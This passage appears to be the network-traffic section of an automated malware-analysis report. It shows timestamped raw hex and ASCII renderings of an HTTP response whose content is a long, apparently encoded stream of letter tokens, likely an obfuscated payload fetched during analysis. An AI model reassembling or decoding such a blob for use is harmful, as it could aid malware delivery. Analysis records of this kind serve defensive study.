56 20 59 56 20 4e 72 63 20 56 4c 20 72 4d 20 63 72 20 4e 72 43 20 4e 4e 59 20 59 72 20 4e 4e 56 20 59 43 20 59 72 20 63 59 20 4e 49 4c 20 49 72 20 4e 4e 72 20 4e 4e
                                                            Data Ascii: Ir NNr NNY LC NNr rI rI YV cC MY NVY VrI WW NNV YC YC VL LV cr NrC NNY YL NNV YC Yr cY NIL Ir NNr NNY VCM IY LM Lc VCr rI NL NNr NNM NCM L NMW rI YC rI Vrc IM NCW NVN NrV YV NCc YC Yr IV N Vrr NCW NNV YV Nrc VL rM cr NrC NNY Yr NNV YC Yr cY NIL Ir NNr NN
                                                            2021-10-29 18:10:44 UTC1295INData Raw: 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 59 56 20 56 43 63 20 59 56 20 59 43 20 49 63 20 4e 4e 72 20 4e 4e 59 20 4c 43 20 56 4e 4c 20 59 43 20 72 49 20 59 63 20 4c 43 20 63 49 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 49 49 20 4c 59 20 72 49 20 59 43 20 56 57 20 4e 56 72 20 56 59 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 72 20 56 56 20 72 57 20 59 43 20 49 4e 20 57 43 20 59 49 20 4e 43 57 20 4e 4e 56 20 59 56 20 56 63 20 59 43 20 59 72 20 4d 57 20 63 63 20 4e 4e 4c 20 4e 43 57 20 59 4d 20 59 4e 20 72 49 20 59 43 20 72 4e 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 43 59 20 4c 20 4e 57 43 20 72 57 20 59 43 20 72 49 20 4e 4e 4c 20 4e 20 56 4e 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 57 59 20 57 4c 20 59 59 20 49 72 20 4e 4e 63 20 49 43 20 4c 43 20 4e 43 59 20 59 43 20
                                                            Data Ascii: NNM NCW NNI YV VCc YV YC Ic NNr NNY LC VNL YC rI Yc LC cI NNr NNM MC II LY rI YC VW NVr VYC NNM NCW NNI Vr VV rW YC IN WC YI NCW NNV YV Vc YC Yr MW cc NNL NCW YM YN rI YC rN Ir NNr NCC NCY L NWC rW YC rI NNL N VNC NCW NNV Yc WY WL YY Ir NNc IC LC NCY YC
                                                            2021-10-29 18:10:44 UTC1296INData Raw: 4c 20 59 43 20 72 49 20 59 43 20 4e 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 56 4e 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 57 49 20 59 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 63 4e 20 72 49 20 59 43 20 59 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4e 57 20 49 59 20 4e 4e 72 20 4e 4e 4d 20 72 72 20 4e 4e 4c 20 59 43 20 72 49 20 59 4e 20 59 72 20 49 72 20 4e 4e 72 20 49 4e 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 4e 59 20 72 57 20 59 43 20 59 72 20 56 56 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4d 20 59 43 20
                                                            Data Ascii: L YC rI YC NI Ir NNr NNc NCW NNV YC rI VNc Yr Ir NNr NVc NCW NNV YC NWI YC Yr Ir NNL NNM NCW NNV cN rI YC YY Ir NNr NNM NCW NNV YC rI YC NNW IY NNr NNM rr NNL YC rI YN Yr Ir NNr IN NCW NNV YN rI YC Yr Ir NNr NNM NCW NNV NNY rW YC Yr VV NNY NNM NCW NNM YC
                                                            2021-10-29 18:10:44 UTC1298INData Raw: 43 20 59 72 20 57 72 20 56 57 20 4e 57 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 72 20 4e 4c 57 20 59 59 20 49 72 20 4e 4e 63 20 4e 4e 4c 20 63 57 20 4e 59 43 20 59 43 20 72 49 20 59 56 20 4c 43 20 56 56 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 43 20 4c 4c 20 43 20 63 56 20 59 72 20 4e 57 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 43 20 72 56 20 4e 4e 4d 20 4e 4e 63 20 4e 43 57 20 4e 4e 63 20 4c 4e 20 56 43 20 4c 63 20 56 4c 43 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 49 20 4e 4c 49 20 72 49 20 59 43 20 63 43 20 4e 4c 56 20 4e 56 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 56 63 20 4e 4c 63 20 59 43 20 59 72 20 57 72 20 57 43 20 56 43 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 72 20 4e 4c 63 20 59 72 20
                                                            Data Ascii: C Yr Wr VW NWr NCW NNV Yc Vr NLW YY Ir NNc NNL cW NYC YC rI YV LC VVM NNY NNM NCM WC LL C cV Yr NWr NNr NNM NCW NNV YC rI YC YC rV NNM NNc NCW NNc LN VC Lc VLC NV NNr NNM NCI II NLI rI YC cC NLV NVc NNM NCW NNr Vc NLc YC Yr Wr WC VCr NCW NNV Yc Vr NLc Yr
                                                            2021-10-29 18:10:44 UTC1299INData Raw: 20 56 56 63 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 4c 59 20 59 56 20 57 4c 20 56 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4e 4e 49 20 57 4c 20 4e 43 20 59 43 20 59 72 20 49 56 20 49 4d 20 4e 43 57 20 57 72 20 4e 56 43 20 72 49 20 59 4e 20 59 72 20 4c 43 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 4e 43 59 20 4e 20 59 72 20 63 59 20 4e 59 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 4c 20 57 43 20 59 43 20 72 49 20 59 4e 20 72 56 20 49 72 20 4e 4e 72 20 4e 4e 57 20 4e 43 57 20 57 4d 20 59 43 20 72 72 20 4c 4e 20 59 72 20 57 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 72 49 20 72 49 20 4e 4e 63 20 59 72 20 4d 56 20 4e 63 20 4e 4e 4d 20 57 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4d 63 20 49 63 20 57 43 20 4e 4d 4e 20 4e 43 57
                                                            Data Ascii: VVc NNc NCW NNI LY YV WL VrC Ir NNr NVM NNN NNI WL NC YC Yr IV IM NCW Wr NVC rI YN Yr LC NV NNr NNM NCM NCY N Yr cY NYM Ir NNr NVM VL WC YC rI YN rV Ir NNr NNW NCW WM YC rr LN Yr WC NNr NNM NCW NNV rI rI NNc Yr MV Nc NNM WW NNV YC rI YC NMc Ic WC NMN NCW
                                                            2021-10-29 18:10:44 UTC1300INData Raw: 56 20 59 56 20 59 4e 20 57 4c 20 49 4e 20 49 59 20 4e 4e 72 20 4e 4e 59 20 63 57 20 4e 56 59 20 59 43 20 72 49 20 59 56 20 49 57 20 4e 59 4d 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 4e 72 20 59 56 20 57 59 20 4d 20 59 72 20 49 72 20 4e 4e 63 20 49 43 20 4e 4e 4d 20 63 4d 20 59 49 20 59 43 20 72 57 20 59 43 20 4e 56 72 20 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 72 4c 20 4c 20 59 56 20 63 57 20 56 59 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 43 20 56 72 20 4e 72 56 20 72 57 20 49 57 20 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 56 20 56 43 20 59 43 20 72 57 20 49 57 20 59 59 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 4e 49 57 20 72 49 20 59 43 20 72 49 20 59 57 20 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 4c 20 72 43 20 4e 20 63 56 20
                                                            Data Ascii: V YV YN WL IN IY NNr NNY cW NVY YC rI YV IW NYM NNr NNM NCL NNr YV WY M Yr Ir NNc IC NNM cM YI YC rW YC NVr NI NNM NCW NNI rL L YV cW VYY NNr NNM NCL NC Vr NrV rW IW M NNY NNM NCM WV VC YC rW IW YY NNY NNM NCM II NIW rI YC rI YW rI NNM NCW NNI VL rC N cV
                                                            2021-10-29 18:10:44 UTC1302INData Raw: 59 43 20 72 49 20 59 57 20 4d 4d 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 43 20 59 43 20 4c 4d 20 4e 49 4d 20 4e 56 4d 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 59 20 4c 63 20 63 4d 20 4e 59 59 20 59 72 20 49 72 20 4e 4e 63 20 56 4e 59 20 63 57 20 56 59 4c 20 59 43 20 72 49 20 59 56 20 49 57 20 56 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 49 63 20 56 72 20 72 49 20 59 43 20 59 72 20 4d 4e 20 63 63 20 4e 4e 56 20 4e 43 57 20 4e 57 56 20 59 4e 20 72 49 20 59 43 20 4e 57 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 49 49 20 4e 49 72 20 72 49 20 59 43 20 72 49 20 4c 57 20 4e 4e 57 20 4e 4e 57 20 4e 43 57 20 4e 4e 49 20 59 63 20 72 4d 20 63 4e 20 4e 49 4d 20 57 43 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 59 20 4c 63 20 4c 63 20 56 43 72 20 72 49 20 4c 49
                                                            Data Ascii: YC rI YW MM NNM NCW NNI VC YC LM NIM NVM NNr NNM NNN IY Lc cM NYY Yr Ir NNc VNY cW VYL YC rI YV IW VN NNr NNM NCM Ic Vr rI YC Yr MN cc NNV NCW NWV YN rI YC NW Ir NNr NCC NNN II NIr rI YC rI LW NNW NNW NCW NNI Yc rM cN NIM WC NNr NNM NNN IY Lc Lc VCr rI LI
                                                            2021-10-29 18:10:44 UTC1303INData Raw: 20 4e 4e 63 20 56 4e 59 20 63 57 20 56 72 49 20 59 43 20 72 49 20 59 56 20 72 49 20 4c 57 20 56 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 57 20 59 63 20 59 4e 20 59 72 20 49 43 20 57 43 20 56 72 43 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 72 20 56 43 72 20 72 49 20 49 56 20 4e 4e 56 20 4e 4e 4d 20 4e 43 4d 20 4c 20 4e 59 4e 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 57 49 20 4e 4e 4d 20 4e 43 57 20 57 4e 20 56 63 20 4c 4c 20 59 43 20 59 72 20 4e 56 4d 20 57 43 20 56 72 4c 20 4e 43 57 20 4e 4e 56 20 59 56 20 56 72 20 4e 49 4e 20 59 72 20 49 72 20 4e 4e 63 20 4e 4e 59 20 4e 72 4d 20 4e 4e 49 20 59 4c 20 59 43 20 59 43 20 72 49 20 4c 57 20 56 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 4c 56 20 59 43 20 59 72 20 4e 56 4d 20 57 43 20 4e 43 43 20
                                                            Data Ascii: NNc VNY cW VrI YC rI YV rI LW VNr NNM NCW NVV MW Yc YN Yr IC WC VrC NCW NNV YV Yr VCr rI IV NNV NNM NCM L NYN rI YC cC NVr WI NNM NCW WN Vc LL YC Yr NVM WC VrL NCW NNV YV Vr NIN Yr Ir NNc NNY NrM NNI YL YC YC rI LW VNY NNM NCW NVV Vc LV YC Yr NVM WC NCC
                                                            2021-10-29 18:10:44 UTC1304INData Raw: 4e 56 20 59 43 20 72 49 20 56 4e 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 57 4d 20 59 43 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 56 56 20 72 49 20 59 43 20 59 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 59 72 20 59 43 20 72 49 20 59 43 20 63 4e 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 59 59 20 4e 4e 56 20 59 43 20 72 49 20 72 57 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 56 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 72 4d 20 72 57 20 59 43 20 59 72 20 4d 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 72 49 20 59 43 20 4e 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 59 43
                                                            Data Ascii: NV YC rI VNc Yr Ir NNr NVc NCW NNV YC NWM YC Yr Ir NNY NNM NCW NNV VV rI YC YY Ir NNr NNM NCW NYr YC rI YC cN Ir NNr NNM NYY NNV YC rI rW Yr Ir NNr NVV NCW NNV YN rI YC Yr Ir NNr NNM NCW NNV rM rW YC Yr ML NNY NNM NCW NNL YC rI YC NI Ir NNr NNc NCW NNV YC
                                                            2021-10-29 18:10:44 UTC1306INData Raw: 4d 4e 20 56 72 63 20 59 72 20 56 72 20 4e 4c 59 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 56 4e 57 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 56 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 56 43 4e 20 59 4e 20 72 49 20 59 56 20 59 43 20 4e 56 72 20 4e 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 63 20 4e 4c 59 20 59 4e 20 59 72 20 49 56 20 49 49 20 4e 43 56 20 57 4c 20 4e 56 72 20 59 43 20 4e 63 63 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 72 20 4d 49 20 59 63 20 59 59 20 49 72 20 4e 4e 49 20 49 49 20 4d 4c 20 4e 43 56 20 56 56 63 20 4e 43 72 20 59 43 20 59 72 20 49 59 20 57 43 20 56 43 59 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 56 72 20 63 4c 20 59 72 20 49 72 20 4e 4e 56 20 57 4c 20 56 4e 4c 20 4e 4e 56 20
                                                            Data Ascii: MN Vrc Yr Vr NLY Yr Ir NVC Vc VNW NNV YC YI WL NVW Ir NNr NVM cW VCN YN rI YV YC NVr NrI NNM NCW NNI Vc NLY YN Yr IV II NCV WL NVr YC Ncc YC Yr Ir NNr NNM NCW NNV Yr MI Yc YY Ir NNI II ML NCV VVc NCr YC Yr IY WC VCY NCW NNV Yc VVr cL Yr Ir NNV WL VNL NNV
                                                            2021-10-29 18:10:44 UTC1307INData Raw: 20 72 49 20 59 56 20 4c 57 20 49 43 20 57 43 20 4e 72 72 20 4e 43 57 20 4e 4e 56 20 59 56 20 57 59 20 4e 63 56 20 59 59 20 49 72 20 4e 4e 63 20 4e 43 43 20 4e 43 59 20 4c 4e 20 56 72 72 20 72 49 20 59 43 20 63 43 20 49 43 20 57 43 20 56 43 4e 20 4e 43 49 20 4e 4e 56 20 59 56 20 59 72 20 57 4c 20 63 4d 20 49 59 20 4e 4e 72 20 4e 4e 59 20 4d 4e 20 4e 4e 56 20 59 43 20 72 57 20 72 63 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 56 72 20 4e 4e 56 20 72 63 20 56 57 20 59 43 20 59 63 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 4e 49 20 59 43 20 72 56 20 59 72 20 4e 4e 72 20 4e 56 4c 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 4e 63 20 59 43 20 4e 56 72 20 56 43 63 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 56 63 20 56 4c 49 20 59
                                                            Data Ascii: rI YV LW IC WC Nrr NCW NNV YV WY NcV YY Ir NNc NCC NCY LN Vrr rI YC cC IC WC VCN NCI NNV YV Yr WL cM IY NNr NNY MN NNV YC rW rc Yr Ir NNV NNM NVr NNV rc VW YC Yc Ir NNr NNM NCW NNr YC NNI YC rV Yr NNr NVL NCW NNV YC rI NNc YC NVr VCc NNc NCW NNI Vc VLI Y
                                                            2021-10-29 18:10:44 UTC1308INData Raw: 4c 20 49 59 20 59 4e 20 59 72 20 49 56 20 56 57 20 56 56 59 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 43 20 4e 57 4e 20 56 57 20 49 72 20 4e 4e 72 20 4e 4e 57 20 4d 56 20 4e 43 56 20 63 59 20 4e 63 4c 20 59 43 20 59 72 20 49 56 20 56 43 49 20 49 43 20 4e 56 56 20 4e 4e 49 20 4e 72 72 20 56 72 20 4e 57 4e 20 59 72 20 49 72 20 4e 4e 63 20 4e 56 63 20 4e 43 63 20 4e 4e 59 20 57 4c 20 49 57 20 59 4e 20 59 72 20 49 56 20 57 43 20 56 72 57 20 4e 43 57 20 4e 4e 56 20 59 56 20 57 59 20 56 72 49 20 59 72 20 49 72 20 4e 56 43 20 4e 4e 4c 20 63 57 20 56 43 72 20 59 4e 20 72 49 20 59 56 20 72 57 20 59 57 20 56 72 4c 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 56 72 20 4e 63 63 20 72 57 20 49 57 20 59 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 56 20 72 63 20 59 56 20 56 63
                                                            Data Ascii: L IY YN Yr IV VW VVY NCW NNV YV rC NWN VW Ir NNr NNW MV NCV cY NcL YC Yr IV VCI IC NVV NNI Nrr Vr NWN Yr Ir NNc NVc NCc NNY WL IW YN Yr IV WC VrW NCW NNV YV WY VrI Yr Ir NVC NNL cW VCr YN rI YV rW YW VrL NNc NCW NNI Vr Ncc rW IW YL NNY NNM NCM WV rc YV Vc
                                                            2021-10-29 18:10:44 UTC1312INData Raw: 59 20 56 4c 20 59 72 20 49 72 20 4e 56 43 20 49 57 20 4e 43 72 20 4e 43 4c 20 4c 4c 20 59 72 20 56 59 20 63 4c 20 4d 43 20 4e 56 56 20 57 4c 20 49 49 20 4e 4e 56 20 59 43 20 59 49 20 4c 4e 20 56 4c 56 20 4e 4c 49 20 4e 56 72 20 4e 43 4c 20 4e 43 4e 20 4e 72 56 20 4c 63 20 59 63 20 59 43 20 59 72 20 4d 57 20 56 57 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 4c 63 20 4c 59 20 72 49 20 4e 4e 43 20 4e 4d 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4c 4c 20 59 59 20 63 57 20 72 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 57 20 59 63 20 4c 4c 20 59 63 20 49 57 20 4e 4c 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 57 20 59 4c 20 4c 49 20 4c 4c 20 63 4e 20 63 63 20 57 4d 20 4e 56 4e 20 4d 43 20 59 4d 20 4c 59 20 59 57 20 4c 4e 20 4e 56 4c 20 63 63
                                                            Data Ascii: Y VL Yr Ir NVC IW NCr NCL LL Yr VY cL MC NVV WL II NNV YC YI LN VLV NLI NVr NCL NCN NrV Lc Yc YC Yr MW VW NVc NCW NNV Yc VLc LY rI NNC NMc NNM NCW NNV YC LL YY cW rI NNr NNM NCL WW Yc LL Yc IW NLY NNr NNM NCL WW YL LI LL cN cc WM NVN MC YM LY YW LN NVL cc
                                                            2021-10-29 18:10:44 UTC1316INData Raw: 72 20 56 43 63 20 4e 4e 56 20 4e 4e 4d 20 4e 43 57 20 4e 4d 57 20 72 49 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 72 49 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 72 4c 20 72 49 20 59 72 20 49 72 20 4e 63 4e 20 4e 4e 57 20 4e 43 57 20 4e 4e 56 20 59 63 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 72 49 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 49 43 20 4e 4e 72 20 59 43 20 72 49 20 56 4c 4d 20 59 56 20 49 72 20 4e 4e 72 20 4e 4e 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 59 20 4e 4e 56 20 4e 56 4c 20 72 57 20 59 43 20 59 72 20 4e 56 63
                                                            Data Ascii: r VCc NNV NNM NCW NMW rI rI YC YL Ir NNr NNM WI NNV YC rW rI Yr Ir NNr NCN NCW NNV YC VrL rI Yr Ir NcN NNW NCW NNV Yc rI YC Yr Ir NNr NNM NCW NNV YC rI YC rI Ir NNr NNM NIC NNr YC rI VLM YV Ir NNr NNI NCW NNV YC YI YC Yr IY NCY cW NCY NNV NVL rW YC Yr NVc
                                                            2021-10-29 18:10:44 UTC1317INData Raw: 4d 20 59 72 20 49 72 20 4e 56 43 20 4e 63 57 20 4e 56 72 20 4e 4e 4d 20 4c 4e 20 4c 56 20 59 4c 20 4c 57 20 49 43 20 4e 4e 4c 20 4e 4e 4c 20 63 57 20 56 56 72 20 59 43 20 72 49 20 59 56 20 4c 43 20 63 63 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 4e 56 4c 20 59 57 20 57 59 20 63 56 20 59 72 20 49 72 20 4e 56 43 20 49 49 20 56 59 59 20 4e 4d 72 20 59 63 20 59 4d 20 4c 43 20 72 49 20 57 4c 20 56 57 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 4c 63 20 56 4c 63 20 59 4c 20 4e 4e 72 20 4e 4d 56 20 4e 4e 4d 20 4e 43 59 20 57 57 20 59 49 20 4c 49 20 4c 4c 20 63 4c 20 4e 56 4d 20 49 4c 20 4e 43 43 20 4e 43 4e 20 57 4d 20 59 57 20 4e 4d 43 20 4c 4c 20 63 43 20 49 4c 20 4e 4e 56 20 4e 43 43 20 4e 43 4c 20 49 49 20 56 4c 4c 20 72 49 20 59 43 20 63 43 20 4e 56 72 20
                                                            Data Ascii: M Yr Ir NVC NcW NVr NNM LN LV YL LW IC NNL NNL cW VVr YC rI YV LC cc NNr NNM MC NVL YW WY cV Yr Ir NVC II VYY NMr Yc YM LC rI WL VW NVc NCW NNV Yc VLc VLc YL NNr NMV NNM NCY WW YI LI LL cL NVM IL NCC NCN WM YW NMC LL cC IL NNV NCC NCL II VLL rI YC cC NVr
                                                            2021-10-29 18:10:44 UTC1322INData Raw: 49 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4e 20 4d 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 56 63 20 4e 4e 63 20 4d 63 20 72 63 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 4e 56 20 4e 43 43 20 4c 20 4e 63 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 49 4e 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 56 43 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 4e 4c 20 4e 56 72 20 4e 4e 63 20 72 59 20 63 4c 20 4e 57 4e 20 4e 43 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4d 56 20 4e 63 43 20 56 4e 59 20 72 49 20 59 43 20 59 43 20 4e 56 72 20 63 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 59 20 49 20 59 43 20 59 72 20 57 72 20 56 57 20 49 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 49 20 72 43 20 72 43 20 56 4e 4d 20 72 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 56
                                                            Data Ascii: Ir NCW NNV Yc cN Mc rC Ir NNr NVM NVc NNc Mc rc YC Yr Wr WM NNV NCC L Nc rI YC cC NVr IN NNM NCW NVV WL VC YC Yr Wr WM NNL NVr NNc rY cL NWN NCI Ir NNr NNc MV NcC VNY rI YC YC NVr cW NNM NCW NVV cY I YC Yr Wr VW IC NCW NNV Yc VI rC rC VNM rC NNM NCW NNL V
                                                            2021-10-29 18:10:44 UTC1326INData Raw: 56 20 59 63 20 4e 43 20 56 4e 4c 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 63 20 4e 4e 57 20 49 49 20 57 63 20 72 49 20 59 43 20 63 43 20 4d 59 20 4e 43 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 56 4c 43 20 4e 4c 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 49 49 20 59 20 72 49 20 59 43 20 63 43 20 4c 57 20 4d 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 56 4d 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 56 59 20 4e 43 4d 20 4c 20 4e 57 57 20 72 49 20 59 43 20 72 49 20 4d 4e 20 4e 4e 49 20 4e 43 43 20 4e 43 59 20 57 49 20 59 4e 20 56 72 20 56 4e 57 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 4c 4e 20 4e 4e 56 20 59 43 20 59 72 20 4c 59 20 59 43 20 63 4d 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 4c 63 20 72 4e
                                                            Data Ascii: V Yc NC VNL Yr Ir NNr NCc NNW II Wc rI YC cC MY NCN VrI YY NNV YC rW VL VLC NLC NNr NNM NCY II Y rI YC cC LW Mr NNM NCW NVV Vc VM YC Yr Wr WM NVY NCM L NWW rI YC rI MN NNI NCC NCY WI YN Vr VNW Yr Ir NVC Vc NLN NNV YC Yr LY YC cM VYY rM NCW NNV YN VN Lc rN
                                                            2021-10-29 18:10:44 UTC1330INData Raw: 59 20 4d 56 20 56 20 63 72 20 59 4d 20 59 43 20 4d 43 20 4e 56 72 20 4e 4d 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 72 20 4e 4e 57 20 59 63 20 59 72 20 4c 63 20 4e 56 20 4e 43 4d 20 4e 43 57 20 4e 4e 56 20 59 63 20 57 59 20 72 59 20 59 72 20 49 72 20 4e 56 43 20 4d 20 4e 63 20 4e 56 56 20 59 43 20 63 72 20 63 72 20 4e 59 59 20 57 72 20 4e 4e 72 20 59 20 4e 57 20 4e 4e 43 20 59 43 20 72 49 20 59 63 20 4c 43 20 4d 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 49 49 20 4e 4e 20 72 49 20 59 43 20 63 43 20 59 57 20 4e 4c 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 4c 20 63 63 20 4e 72 4c 20 63 43 20 49 72 20 56 20 4d 20 4e 56 72 20 4e 56 4c 20 59 43 20 63 72 20 4d 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 4e 4e 4e 20 59 43 20 72 49 20 59 63 20 4c
                                                            Data Ascii: Y MV V cr YM YC MC NVr NM NNM NCW NVV cr NNW Yc Yr Lc NV NCM NCW NNV Yc WY rY Yr Ir NVC M Nc NVV YC cr cr NYY Wr NNr Y NW NNC YC rI Yc LC MY NNr NNM NCL II NN rI YC cC YW NLC NNM NCW NNI VL cc NrL cC Ir V M NVr NVL YC cr Mc rC Ir NNr NVM cW NNN YC rI Yc L
                                                            2021-10-29 18:10:44 UTC1334INData Raw: 43 43 20 57 49 20 56 59 59 20 56 49 20 72 49 20 59 43 20 59 56 20 72 4d 20 49 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 57 4e 20 57 59 20 4e 57 56 20 59 72 20 49 72 20 4e 56 43 20 56 4e 59 20 49 59 20 56 56 63 20 59 43 20 72 49 20 59 43 20 59 56 20 72 4d 20 4e 43 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 59 4c 20 59 63 20 4e 43 63 20 4e 49 59 20 4e 43 43 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 4e 4e 20 56 4d 20 72 49 20 59 43 20 59 43 20 63 57 20 4e 56 59 20 4e 43 63 20 57 4d 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 4c 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 56 63 20 49 49 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4e 4e 20
                                                            Data Ascii: CC WI VYY VI rI YC YV rM Ic NNM NCW NNc WN WY NWV Yr Ir NVC VNY IY VVc YC rI YC YV rM NCV NNM NCW NNc YL Yc NCc NIY NCC NNr NNM NNN NN VM rI YC YC cW NVY NCc WM VYL NCr rI YC YY NNL NcV NLY NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI Vc II Ir NNr NVM NNN NN
